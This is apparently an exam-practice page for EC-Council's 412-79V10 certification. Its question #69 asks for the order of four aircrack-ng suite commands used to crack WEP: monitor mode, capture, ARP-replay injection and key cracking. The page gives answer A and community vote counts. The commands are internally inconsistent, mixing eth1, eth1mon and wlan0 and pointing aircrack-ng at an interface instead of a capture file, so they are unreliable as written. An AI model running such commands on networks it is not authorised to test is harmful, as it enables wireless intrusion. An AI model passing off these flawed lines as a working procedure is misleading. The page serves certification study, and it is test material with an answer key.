EC-Council
412-79V10 · Question #69
Arrange the WEP cracking process in the correct order: I. aircrack-ng -a 1 -f 1000 -e SECRET_SSID -w /root/wordlist.txt -b 00:11:22:33:44:55 wlan0 II. airmon-ng start eth1 III. airodump-ng -w…
The correct answer is A. II->III->IV->I. See the full explanation below for the reasoning.
Question
Arrange the WEP cracking process in the correct order:
I. aircrack-ng -a 1 -f 1000 -e SECRET_SSID -w /root/wordlist.txt -b 00:11:22:33:44:55 wlan0
II. airmon-ng start eth1
III. airodump-ng -w capture eth1mon
IV. aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:AA:BB:CC:DD:EE wlan0
Options
- AII->III->IV->I
- BIII->II->IV->I
- CIV->II->I->III
- DII->IV->III->I
How the community answered
(66 responses)- A71% (47)
- B9% (6)
- C17% (11)
- D3% (2)
Community Discussion
No community discussion yet for this question.